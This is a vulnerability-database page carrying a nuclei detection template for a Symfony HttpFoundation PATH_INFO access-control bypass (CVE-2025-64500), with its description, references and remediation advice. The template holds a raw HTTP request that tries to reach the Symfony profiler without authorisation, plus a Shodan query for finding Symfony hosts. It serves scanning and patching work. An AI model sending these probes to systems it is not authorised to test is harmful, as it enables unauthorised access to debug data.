Lucene search
K

Symfony HttpFoundation - Access Control Bypass via PATH_INFO

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Symfony HttpFoundation PATH_INFO parsing flaw allows access control bypass; update to fixed versions.

Related
Refs
Code
id: CVE-2025-64500

info:
  name: Symfony HttpFoundation - Access Control Bypass via PATH_INFO
  author: DhiyaneshDk
  severity: high
  description: |
    Symfony HttpFoundation component >= 2.0.0 and prior to versions 5.4.50, 6.4.29, and 7.3.7 contains an access control bypass vulnerability. The Request class improperly interprets some PATH_INFO values, producing URL paths without a leading `/`. This allows bypassing access control rules that are built with the `/-prefix` assumption.
  impact: |
    Attackers can bypass access control rules, potentially gaining unauthorized access to restricted resources.
  remediation: Update to Symfony versions 5.4.50, 6.4.29, or 7.3.7 or later.
  reference:
    - https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rm
    - https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass
    - https://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cac
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64500
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-64500
    cwe-id: CWE-647
    epss-score: 0.01326
    epss-percentile: 0.67533
  metadata:
    verified: true
    max-request: 2
    vendor: sensiolabs
    product: symfony
    shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony"
  tags: cve,cve2025,symfony,auth-bypass

http:
  - raw:
      - |
        GET /{{front_controller}}_profiler/ HTTP/1.1
        Host: {{Hostname}}

    payloads:
      front_controller:
        - "index.php"
        - "app.php"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "Symfony Profiler"
          - "<title>Profiler</title>"
          - "Symfony-Debug-Toolbar"
        condition: or
# digest: 4a0a00473045022100d7025477aeb6f4a1fe804a38874f33e831fc7d284341b08c423720a43dee781c0220240ca14d6283744b47c153d63c9694cdcd4b206742b083ddf95aa69f05b1848a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Apr 2026 05:29Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.3
EPSS0.01326
SSVC
15